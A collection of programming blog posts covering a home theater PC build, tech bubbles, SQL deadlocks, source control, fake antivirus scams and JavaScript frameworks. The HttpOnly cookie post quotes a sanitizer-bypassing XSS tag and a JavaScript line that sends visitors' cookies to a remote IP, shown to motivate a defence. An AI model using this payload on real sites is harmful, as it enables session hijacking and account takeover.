| Motherboard | ASRock H67M ITX | $100 |
| RAM | Corsair 4GB DDR3 | $45 |
| Case + PSU | Antec ISK 300-65 | $70 |
| HDD | 750GB 2.5″ | $70 |
Now, I am fudging a bit here. This is just the basic level of hardware to get a functional home theater PC. I didn’t actually buy a case, PSU, or even hard drive for that matter; I recycled many of my old existing parts, so my personal outlay was all of 300 bucks. I’m including the fuller part list as courtesy recommendations in case you’re starting from scratch. You also might want to add a Blu-Ray drive, and perhaps a Windows 7 Home Premium license ($99) for its excellent 10-foot Windows Media Center interface.
The magical part here is the extreme level of hardware integration: the CPU has a GPU and memory controller on die, and the motherboard has optical digital out and HDMI out built in. It’s delightfully simple to build and downright cheap. Just assemble it, install your OS of choice (sorry, Apple fans), then plug it into your receiver and television and boot it up.
My results? I’ll just get right to the good part, but please bear in mind each step is about twice as powerful as the one before:
| 2005 | ~$1000 | 512 MB RAM, single core CPU | 80 watts idle |
| 2008 | ~$520 | 2 GB RAM, dual core CPU | 45 watts idle |
| 2011 | ~$420 | 4 GB RAM, dual core CPU + GPU | 22 watts idle |
I know I get way too excited about this stuff, but … holy crap, 22 tesla-lovin’ watts at idle!
The kill-a-watt never lies. To be fair, it’s more like 25 watts idle with torrents in the background. This little box is remarkably efficient; even when playing back a 1080p video it’s not unusual to see CPU usage well under 50%, which equates to around 30-35 watts in practice. Under full, artificial multithreaded Prime95 load, it tops out at an absolute peak of 55 watts.
This is a killer setup, but don’t take my word for it. There is an excruciatingly in-depth review of essentially the same system at Missing Remote, with a particular eye toward home theater duties. Spoiler: they loved the hell out of it too. And it compromises almost nothing in performance, with a Windows Experience score of 5.1 — that would be a solid 5.8 if you factored out desktop Aero performance.
(Also, in case you’re wondering, I intentionally dropped the analog cable tuner. All modern cable is now digital, which means awkward DRM-ed up the wazoo CableCard systems. I’ve cancelled cable altogether; I’d rather take that $60+ per month and use it to support innovative companies who will deliver media through the internet, like Netflix, Hulu, etcetera. Or as I like to call it: the future, unless the media congolomerates with vaults full of cash manage to subvert net neutrality.)
When all is said and done, I have a new always-on, does-anything home theater box that is twice as fast as the one I built in 2008, while consuming less than half the power.
I’ve been a computer nerd since age 8, and I just turned 40. I should be jaded by computer hardware pornography by now, but I still find this progress amazing. At this rate, I can’t wait to find out what my 2014 home theater PC will look like.
More: continued here
Popularity: unranked [?]
Sphere: Related ContentLived Fast, Died Young, Left a Tired Corpse
It’s easy to forget just how crazy things got during the Web 1.0 bubble in 2000. That was over ten years ago. For context, Mark Zuckerberg was all of sixteen when the original web bubble popped.
There’s plenty of evidence that we’re entering another tech bubble. It’s just less visible to people outside the tech industry because there’s no corresponding stock market IPO frenzy. Yet.
There are two films which captured the hyperbole and excess of the original dot com bubble especially well.
The first is the documentary Startup.com. It’s about the prototypical web 1.0 company: one predicated on an idea that made absolutely no sense, which proceeded to flame out in a spectacular and all too typical way for the era. This one just happened to occur on digital film. The govworks.com website described in the documentary, the one that burned through $60 million in 18 months, is now one of those ubiquitous domain squatter pages. A sign of the times, perhaps.
The second film was one I had always wanted to see, but wasn’t able to until a few days ago: Code Rush. For a very long time, Code Rush was almost impossible to find, but the activism of Andy Baio nudged the director to make the film available under Creative Commons. You can now watch it online — and you absolutely should.
Remember when people charged money for a web browser? That was Netscape.
Code Rush is a PBS documentary recorded at Netscape from 1998 - 1999, focusing on the open sourcing of the Netscape code. As the documentary makes painfully clear, this wasn’t an act of strategy so much as an act of desperation. That’s what happens when the company behind the world’s most ubiquitous operating system decides a web browser should be a standard part of the operating system.
Everyone in the documentary knows they’re doomed; in fact, the phrase “we’re doomed” is a common refrain throughout the film. But despite the gallows humor and the dark tone, parts of it are oddly inspiring. These are engineers who are working heroic, impossible schedules for a goal they’re not sure they can achieve — or that they’ll even survive as an organization long enough to even finish.
The most vivid difference between Startup.com and Code Rush is that Netscape, despite all their other mistakes and missteps, didn’t just burn through millions of dollars for no discernable reason. They produced a meaningful legacy:
- Through Netscape Navigator, the original popularization of HTML and the internet itself.
- With the release of the Netscape source code on March 31st, 1998, the unlikely birth of the commercial open source movement.
- Eventually producing the first credible threat to Internet Explorer in the form of Mozilla Firefox 1.0 in 2004.
Do you want money? Fame? Job security? Or do you want to change the world … eventually? Consider how many legendary hackers went on to brilliant careers from Netscape: Jamie Zawinski, Brendan Eich, Stuart Parmenter, Marc Andreeseen. The lessons of Netscape live on, even though the company doesn’t. Code Rush is ultimately a meditation on the meaning of work as a programmer.
I’d like to think that when Facebook – the next Google and Microsoft rolled into one – goes public in early 2012, the markets will react rationally. More likely, people will all collectively lose their damn minds again and we’ll be thrust into a newer, bigger, even more insane tech bubble than the first one.
Yes, you will have incredibly lucrative job offers in this bubble. That’s the easy part. As Startup.com and Code Rush illustrate, the hard part is figuring out why you are working all those long hours. Consider carefully, lest the arc of your career mirror that of so many failed tech bubble companies: lived fast, died young, left a tired corpse.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Powered by SmartRSS
Popularity: unranked [?]
Sphere: Related ContentProtecting Your Cookies: HttpOnly
So I have this friend. I’ve told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities — dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He’s hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?
As it turns out, far more dangerous than expected.
To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It’s all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They’re the keys to your identity as far as the website is concerned.
Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:
<script>alert('hello XSS!');</script>
are automagically converted into their harmless encoded equivalents:
<script>alert('hello XSS!');</script>
In my friend’s defense (not that he deserves any kind of defense) the website he’s working on allows some HTML to be posted by users. It’s part of the design. It’s a difficult scenario, because you can’t just clobber every questionable thing that comes over the wire from the user. You’re put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.
Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.
How did this happen? XSS, of course. It all started with this bit of script added to a user’s profile page.
<img src=""http://www.a.com/a.jpg<script type=text/javascript src="http://1.2.3.4:81/xss.js">" /><<img src=""http://www.a.com/a.jpg</script>"
Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here’s what that JavaScript looks like:
window.location="http://1.2.3.4:81/r.php?u="+document.links[1].text+"&l="+document.links[1]+"&c="+document.cookie;
That’s right — whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!
As we’ve already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don’t believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That’s all it takes. It’s quite an eye opener.
If cookies are so precious, you might find yourself asking why browsers don’t do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.
When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:
- A modern web browser
- A browser that actually implements HttpOnly correctly
The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I’m not sure if the latest versions of Safari do or not. It’s sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn’t exactly known for its iron-clad security record.
Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here’s what a cookie looks like with the HttpOnly flag set:
HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Content-Encoding: gzipVary: Accept-EncodingServer: Microsoft-IIS/7.0Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnlyX-AspNet-Version: 2.0.50727Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnlyX-Powered-By: ASP.NETDate: Tue, 26 Aug 2008 10:51:08 GMTContent-Length: 2838
This isn’t exactly news; Scott Hanselman wrote about HttpOnly a while ago. I’m not sure he understood the implications, as he was quick to dismiss it as “slowing down the average script kiddie for 15 seconds”. In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.
HttpOnly cookies can in fact be remarkably effective. Here’s what we know:
- HttpOnly restricts all access to
document.cookiein IE7, Firefox 3, and Opera 9.5 (unsure about Safari) - HttpOnly removes cookie information from the response headers in
XMLHttpObject.getAllResponseHeaders()in IE7. It should do the same thing in Firefox, but it doesn’t, because there’s a bug. XMLHttpObjectsmay only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.
The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.
Even with those caveats, I believe HttpOnly cookies are a huge security win. If I — er, I mean, if my friend — had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!
HttpOnly cookies don’t make you immune from XSS cookie theft, but they raise the bar considerably. It’s practically free, a “set it and forget it” setting that’s bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.
Now I just need to go tell my friend about them. I’m not sure why I bother. He never listens to me anyway.
(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
More: continued here
Powered by SmartRSS
Popularity: unranked [?]
Sphere: Related ContentDeadlocked!
You may have noticed that my posting frequency has declined over the last three weeks. That’s because I’ve been busy building that Stack Overflow thing we talked about.
It’s going well so far. Joel Spolsky also seems to think it’s going well, but he’s one of the founders so he’s clearly biased. For what it’s worth, Robert Scoble was enthused about Stack Overflow, though it did not make him cry. Still, I was humbled by the way Robert picked this up so enthusiastically through the community. I hadn’t contacted him in any way; I myself only found out about his reaction third hand.
That’s not to say everything has been copacetic. One major surprise in the development of Stack Overflow was this recurring and unpredictable gem:
Transaction (Process ID 54) was deadlocked on lock resources with another process and has been chosen as the deadlock victim. Rerun the transaction.
Deadlocks are a classic computer science problem, often taught to computer science students as the Dining Philosophers puzzle.
Five philosophers sit around a circular table. In front of each philosopher is a large plate of rice. The philosophers alternate their time between eating and thinking. There is one chopstick between each philosopher, to their immediate right and left. In order to eat, a given philosopher needs to use both chopsticks. How can you ensure all the philosophers can eat reliably without starving to death?
Point being, you have two processes that both need access to scarce resources that the other controls, so some sort of locking is in order. Do it wrong, and you have a deadlock — everyone starves to death. There are lots of scarce resources in a PC or server, but this deadlock is coming from our database, SQL Server 2005.
You can attach the profiler to catch the deadlock event and see the actual commands that are deadlocking. I did that, and found there was always one particular SQL command involved:
UPDATE [Posts]SET [AnswerCount] = @p1, [LastActivityDate] = @p2, [LastActivityUserId] = @p3WHERE [Id] = @p0
If it detects a deadlock, SQL Server forces one of the deadlocking commands to lose — specifically the one that uses the least resources. The statement on the losing side varied, but in our case the losing deadlock statement was always a really innocuous database read, like so:
SELECT *FROM [Posts]WHERE [ParentId] = @p0
(Disclaimer: above SQL is simplified for the purpose of this post). This deadlock perplexed me, on a couple levels.
- How can a read be blocked by a write? What possible contention could there be from merely reading the data? It’s as if one of the dining philosophers happened to glance over at another philosoper’s plate, and the other philosopher, seeing this, screamed “meal viewing deadlock!” and quickly covered his plate with his hands. Yes, it’s ridiculous. I don’t want to eat your food — I just want to look at it.
- We aren’t doing that many writes. Like most web apps, we’re insanely read-heavy. The particular SQL statement you see above only occurs when someone answers a question. As much as I want to believe Stack Overflow will be this massive, rip-roaring success, there just cannot be that many answers flowing through the system in beta. We went through our code with a fine tooth comb, and yep, we’re barely writing anywhere except when users ask a question, edit something, or answer a question.
- What about retries? I find it hard to believe that little write would take so incredibly long that a read would have to wait more than a few milliseconds at most.
If you aren’t eating — modifying data — then how can trivial super-fast reads be blocked on rare writes? We’ve had good results with SQL Server so far, but I found this behavior terribly disappointing. Although these deadlocks were somewhat rare, they still occurred a few times a day, and I’m deeply uncomfortable with errors I don’t fully understand. This is the kind of stuff that quite literally keeps me up at night.
I’ll freely admit this could be due to some peculiarities in our code (translated: we suck), and reading through some sample SQL traces of subtle deadlock conditions, it’s certainly possible. We racked our brains and our code, and couldn’t come up with any obvious boneheaded mistakes. While our database is somewhat denormalized, all of our write conditions are relatively rare and hand-optimized to be small and fast. In all honesty, our app is just not all that complex. It ain’t rocket surgery.
If you ever have to troubleshoot database deadlocks, you’ll inevitably discover the NOLOCK statement. It works like this:
SELECT *FROM [Posts] with (nolock)WHERE [ParentId] = @p0
It isn’t just a SQL Server command — it also applies to Oracle and MySQL. This sets the transaction isolation level to read uncommitted, also known as “dirty reads”. It tells the query to use the lowest possible levels of locking.
But is nolock dangerous? Could you end up reading invalid data with read uncommitted on? Yes, in theory. You’ll find no shortage of database architecture astronauts who start dropping ACID science on you and all but pull the building fire alarm when you tell them you want to try nolock. It’s true: the theory is scary. But here’s what I think:
In theory there is no difference between theory and practice. In practice there is.
I would never recommend using nolock as a general “good for what ails you” snake oil fix for any database deadlocking problems you may have. You should try to diagnose the source of the problem first.
But in practice adding nolock to queries that you absolutely know are simple, straightforward read-only affairs never seems to lead to problems. I asked around, and I got advice from a number of people whose opinions and experience I greatly trust and they, to a (wo)man, all told me the same thing: they’ve never seen any adverse reaction when using nolock. As long as you know what you’re doing. One related a story of working with a DBA who told him to add nolock to every query he wrote!
With nolock / read uncommitted / dirty reads, data may be out of date at the time you read it, but it’s never wrong or garbled or corrupted in a way that will crash you. And honestly, most of the time, who cares? If your user profile page is a few seconds out of date, how could that possibly matter?
Adding nolock to every single one of our queries wasn’t really an option. We added it to all the ones that seemed safe, but our use of LINQ to SQL made it difficult to apply the hint selectively.
I’m no DBA, but it seems to me the root of our problem is that the default SQL Server locking strategy is incredibly pessimistic out of the box:
The database philosophically expects there will be many data conflicts; with multiple sessions all trying to change the same data at the same time and corruption will result. To avoid this, Locks are put in place to guard data integrity … there are a few instances though, when this pessimistic heavy lock design is more of a negative than a positive benefit, such as applications that have very heavy read activity with light writes.
Wow, very heavy read activity with light writes. What does that remind me of? Hmm. Oh yes, that damn website we’re building. Fortunately, there is a mode in SQL Server 2005 designed for exactly this scenario: read committed snapshot:
Snapshots rely on an entirely new data change tracking method … more than just a slight logical change, it requires the server to handle the data physically differently. Once this new data change tracking method is enabled, it creates a copy, or snapshot of every data change. By reading these snapshots rather than live data at times of contention, Shared Locks are no longer needed on reads, and overall database performance may increase.
I’m a little disappointed that SQL Server treats our silly little web app like it’s a banking application. I think it’s incredibly telling that a Google search for SQL Server deadlocks returns nearly twice the results of a query for MySql deadlocks. I’m guessing that MySQL, which grew up on web apps, is much less pessimistic out of the box than SQL Server.
I find that deadlocks are difficult to understand and even more difficult to troubleshoot. Fortunately, it’s easy enough to fix by setting read committed snapshot on the database for our particular workload. But I can’t help thinking our particular database vendor just isn’t as optimistic as they perhaps should be.
| [advertisement] Complimentary paperback book on lightweight peer code review. 10 essays from industry experts. Free shipping. Order Best Kept Secrets of Peer Code Review. |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentCheck In Early, Check In Often
I consider this the golden rule of source control:
Check in early, check in often.
Developers who work for long periods — and by long I mean more than a day — without checking anything into source control are setting themselves up for some serious integration headaches down the line. Damon Poole concurs:
Developers often put off checking in. They put it off because they don’t want to affect other people too early and they don’t want to get blamed for breaking the build. But this leads to other problems such as losing work or not being able to go back to previous versions.My rule of thumb is “check-in early and often”, but with the caveat that you have access to private versioning. If a check-in is immediately visible to other users, then you run the risk of introducing immature changes and/or breaking the build.
I’d much rather have small fragments checked in periodically than to go long periods with no idea whatsoever what my coworkers are writing. As far as I’m concerned, if the code isn’t checked into source control, it doesn’t exist. I suppose this is yet another form of Don’t Go Dark; the code is invisible until it exists in the repository in some form.
I’m not proposing developers check in broken code — but I also argue that there’s a big difference between broken code and incomplete code. Isn’t it possible, perhaps even desirable, to write your code and structure your source control tree in such a way that you can check your code in periodically as you’re building it? I’d much rather have empty stubs and basic API skeletons in place than nothing at all. I can integrate my code against stubs. I can do code review on stubs. I can even help you build out the stubs!
But when there’s nothing in source control for days or weeks, and then a giant dollop of code is suddenly dropped on the team’s doorstep — none of that is possible.
Developers that wouldn’t even consider adopting the old-school waterfall method of software development somehow have no problem adopting essentially the very same model when it comes to their source control habits.
Perhaps what we need is a model of software accretion. Start with a tiny fragment of code that does almost nothing. Look on the bright side — code that does nothing can’t have many bugs! Test it, and check it in. Add one more small feature. Test that feature, and check it in. Add another small feature. Test that, and check it in. Daily. Hourly, even. You always have functional software. It may not do much, but it runs. And with every checkin it becomes infinitesimally more functional.
If you learn to check in early and check in often, you’ll have ample time for feedback, integration, and review along the way. And who knows — you might even manage to accrete that pearl of final code that you were looking for, too.
| [advertisement] Peer Code Review. No meetings. No busy-work. Customizable workflows and reports. Try Jolt Award-winning Code Collaborator. |
More: continued here
Powered by SmartRSS
Popularity: unranked [?]
Sphere: Related ContentThe Perils of FUI: Fake User Interface
As a software developer, tell me if you’ve ever done this:
- Taken a screenshot of something on the desktop
- Opened it in a graphics program
- Gone off to work on something else
- Upon returning to your computer, attempted to click on the screenshot as if it was an actual program.
And let’s not forget the common goating technique where you take a screenshot of someone’s desktop, make it the desktop background, then proceed to hide every UI element on the screen. The anguished cries as users desperately double-triple-quadruple click on pixels that look exactly like real user interfaces can typically be heard for miles.
I bring this up to generate some sympathy. I get fooled by my own FUI — Fake User Interface — at least once a month. If it can happen to us, it can happen to anyone. Which means FUI can be quite dangerous in the wrong hands. Consider Ryan Meray’s story:
Okay, so here’s an interesting one. My girlfriend is researching stuff on lilies, so she’s trying to find the website for the Michigan Regional Lily Society.The website address is http://www.mrls.org/
Feel free and browse there directly, there’s nothing wrong with it. But if you don’t remember the URL, your first response is to Google it. We google and get this:
http://www.google.com/search?q=Michigan+Regional+Lily+Society
Now, if you’re in Firefox, everything is fine. You click that first result, and you get to their website, and you learn about lilies.
However, if you are using IE, be aware, you are about to have a Spyware/Virus alert.
Obviously, the poor Michigian Regional Lily Society has fallen prey to website hackers. (Note that it may have been fixed by the time I’m writing this — but I duplicated everything I’m about to show you.)
The first clever point is that the website appears fine if you navigate there directly. The malicious JavaScript code inserted into the page checks the referer and does something different if you arrive there via a web search engine. This means the people who own the website, and never arrive there through Google, would be scratching their heads, wondering what all the fuss is about. So the hack survives longer.
But if you do arrive at the MRLS site through a search engine, like a huge percentage of the world does, you’re redirected to:
http://scanner.antivir64.com/?aff=1050
The very first thing this page does is minimize the browser (Firefox 3, in this case) and present us with this JavaScript alert:
I’m intentionally juxtaposing the browser and the dialog here, but the browser is way off in the very lower right corner of the display and that dialog is smack dab in the middle of the screen. It is not at all clear that the dialog originated from that web page. It’s a primitive technique, but it is surprisingly effective.
I didn’t have the guts to click OK on that dialog; I clicked the close button. The browser then expanded to show this convincing “real time virus scan”.
The static screenshot does not do it justice; the scrollbar moves, the list of files fly by as they are “scanned”, and the web page rather successfully simulates an ersatz UI somewhere between Windows XP and Windows Vista. Of course, we know this Fake User Interface is completely invalid, because it is running in the browser, not on our PC. You and I may understand that distinction, but what about your parents? Your wife? Your children? Your less technically savvy friends? Will they understand this scary, authentic looking virus warning coming from an “encrypted secure site” is all a lie?
Honestly, whose PC doesn’t “run slower than normal”? Maybe I would want to know if my computer is infected with Viruses, Adware or Spyware. It’s all part of the culture of fear that security software companies — and let’s be honest, Windows security software companies — cultivate so they can rake in millions of dollars per year hawking their software. The difference here, of course, is that it’s increasingly difficult to tell the good guys from the bad guys. That’s the downside of fear as a selling point: it cuts equally well in both directions.
Woe betide the poor user who is convinced through the trickery of FUI to install this “antivirus” software. The page does its darndest to convince you to run its payload executable. Any click on the page, no matter where, is interpreted as a download request.
The page also attempts a drive-by download, though those have been auto-blocked for years now.
It’s tempting to put this down as yet another iteration of phishing, the forever hack. To be fair, this is exactly the sort of thing web browser phishing filters were designed to prevent. This site was already in the Firefox 3 phishing filter — but it was not caught by the Internet Explorer 7 phishing filter, so I reported it.
I am all for phishing filters as another important line of defense, but like all distributed blacklists, they’re only so effective.
What I’m more concerned about here is how well the user interface was spoofed. The browser FUI was convincing enough to even make me — possibly the world’s most jaded and cynical Windows user — do a bit of a double-take. How do you protect naive users from cleverly designed FUI exploits like this one? Can you imagine your mother doing a web search on flowers — flowers, for God’s sake — clicking on the search results to a totally legitimate website, and correctly navigating the resulting maze of fake UI, spurious javascript alerts, and download dialogs?
I know I can’t. As much as I admire distributed phishing blacklist efforts, there’s no way they can possibly keep pace with the rapid setup and teardown of hacked websites. How many compromised websites are out there? How many unsophisticated users surf the internet every day?
As always, we can lay a big part of the blame at Microsoft’s doorstep for not adopting the UNIX policy of non-administrator accounts for regular users. But then again, if the spoofing is good enough, the FUI extra-convincing, even a Linux or OS X user could be coerced into entering their admin password for a “system security scan”. Or maybe they just wanted to see the dancing bunnies.
And then, like Ryan, you’re likely to end up with the same infected computer, and the same distraught spouse. All this for the love of a few lilies.
Short of user education, which is a neverending, continuous uphill battle — how would you combat a perfectly spoofed FUI presented to a naive user?
| [advertisement] Peer code review without meetings, paperwork, or stopwatches? No wonder Code Collaborator won the Jolt Award. |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentSecrets of the JavaScript Ninjas
One of the early technology decisions we made on Stack Overflow was to go with a fairly JavaScript intensive site. Like many programmers, I’ve been historically ambivalent about JavaScript:
- The Power of “View Source”
- The Day Performance Didn’t Matter Any More
- JavaScript and HTML: Forgiveness by Default
- JavaScript: The Lingua Franca of the Web
- The Great Browser JavaScript Showdown
However, it’s difficult to argue with the demonstrated success of JavaScript over the last few years. JavaScript code has gone from being a peculiar website oddity to — dare I say it — delivering useful core features on websites I visit on a daily basis. Paul Graham had this to say on the definition of Web 2.0 in 2005:
One ingredient of its meaning is certainly Ajax, which I can still only just bear to use without scare quotes. Basically, what “Ajax” means is “Javascript now works.” And that in turn means that web-based applications can now be made to work much more like desktop ones.
Three years on, I can’t argue the point: JavaScript now works. Just look around you on the web.
Well, to a point. We can no longer luxuriate in the — and to be clear, I mean this ironically — golden age of Internet Explorer 6. We live in a brave new era of increasing browser competition, and that’s a good thing. Yes, JavaScript is now mature enough and ubiquitous enough and fast enough to be a viable client programming runtime. But this vibrant browser competition also means there are hundreds of aggravating differences in JavaScript implementations between Opera, Safari, Internet Explorer, and Firefox. And that’s just the big four. It is excruciatingly painful to write and test your complex JavaScript code across (n) browsers and (n) operating systems. It’ll make you pine for the good old days of HTML 4.0 and CGI.
But now something else is happening, something arguably even more significant than “JavaScript now works”. The rise of commonly available JavaScript frameworks means you can write to higher level JavaScript APIs that are guaranteed to work across multiple browsers. These frameworks spackle over the JavaScript implementation differences between browsers, and they’ve (mostly) done all the ugly grunt work of testing their APIs and validating them against a host of popular browsers and plaforms.
The JavaScript Ninjas have delivered their secret and ultimate weapon: common APIs. They transform working with JavaScript from an unpleasant, write-once-debug-everywhere chore into something that’s actually — dare I say it — fun.
Frankly, it is foolish to even consider rolling your own JavaScript code to do even the most trivial of things in a browser now. Instead, choose one of these mature, widely tested JavaScript API frameworks. Spend a little time learning it. You’ll ultimately write less code that does more — and (almost) never have to worry a lick about browser compatibility. It’s basically browser coding nirvana, as Rick Strahl noted:
I’ve kind of fallen into a couple of very client heavy projects and jQuery is turning out to be a key part in these particular projects. jQuery is definitely one of those tools that has got me really excited as it has changed my perspective in Web Development considerably from dreading doing client development to actually looking forward to applying richer and more interactive client principles.
There are several popular Javascript API frameworks to choose from:
I don’t profess to be an expert in any of these. Far from it. But I will echo what Rick said: using JQuery while writing Stack Overflow is probably the only time in my entire career as a programmer that I have enjoyed writing JavaScript code.
It’s sure pleasant to write code against solid, increasingly standardized JavaScript API libraries that spackle over all those infuriating browser differences. I, for one, would like to thank John Resig and all the other JavaScript Ninjas who share their secrets — and their frameworks — with the rest of the community.
| [advertisement] Read the largest case study ever published about lightweight peer code review in Best Kept Secrets of Peer Code Review. Free book, free shipping. |
More: continued here
Powered by SmartRSS
Popularity: unranked [?]
Sphere: Related Content




